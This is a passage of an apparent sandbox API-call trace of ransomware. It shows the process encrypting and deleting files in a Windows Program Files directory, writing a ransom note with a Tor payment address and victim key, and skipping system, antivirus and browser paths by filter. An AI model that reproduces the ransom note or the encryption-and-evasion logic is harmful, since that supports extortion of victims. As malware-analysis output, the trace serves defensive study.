out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.687] GetLastError () returned 0x0 [0153.687] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.687] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.687] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0153.687] GetLastError () returned 0x0 [0153.687] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0153.687] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0153.687] WriteFile (in: hFile=0x588, lpBuffer=0x29012e0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0153.687] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui")) returned 0x20 [0153.687] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui", dwFileAttributes=0x20) returned 0 [0153.687] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui") returned 1 [0153.687] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui")) returned 0 [0153.688] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui" [0153.688] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 1 [0153.688] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXCB69.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxcb69.tmp")) returned 0xcb69 [0153.689] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXCB69.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxcb69.tmp"), dwFlags=0x1) returned 0 [0153.689] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXCB69.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxcb69.tmp")) returned 1 [0153.689] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0153.689] wcslen (_String="OK") returned 0x2 [0153.689] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0153.689] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0153.689] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0153.689] CryptDestroyHash (hHash=0x9ad3b8) returned 1 [0153.689] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0153.689] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0153.689] GetLastError () returned 0x12 [0153.689] FindClose (in: hFindFile=0x9ad438 | out: hFindFile=0x9ad438) returned 1 [0153.689] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0153.690] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0153.690] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0153.691] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0153.691] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0153.691] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0153.691] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0153.691] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0153.691] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*.exe") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*.dll") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*.lnk") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*.bat") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*.ini") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*.msi") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*.scf") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*pagefile.sys*") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*NTUSER.DAT*") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*AppData*") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*\\winrar\\*") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*\\java\\*") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*\\windows\\*") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*\\ESET\\*") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*\\AVG\\*") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*\\AVIRA\\*") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*Atheros*") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*Realtek*") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*bootmgr*") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*boot*") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*boot*") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*CONFIG.SYS*") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*IO.SYS*") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*MSDOS.SYS*") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*NTDETECT.COM*") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*ntldr*") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*chrome*") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*opera*") returned 0 [0153.691] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", pszSpec="*firefox*") returned 0 [0153.691] wcslen (_String="\\\\?\\") returned 0x4 [0153.691] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad4f8 [0153.692] wcscmp (_String1=".", _String2=".") returned 0 [0153.692] FindNextFileW (in: hFindFile=0x9ad4f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0153.692] wcscmp (_String1="..", _String2=".") returned 1 [0153.692] wcscmp (_String1="..", _String2="..") returned 0 [0153.692] FindNextFileW (in: hFindFile=0x9ad4f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0153.692] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0153.692] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui", pszSpec="*") returned 1 [0153.692] strlen (_Str="NMoreira") returned 0x8 [0153.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] 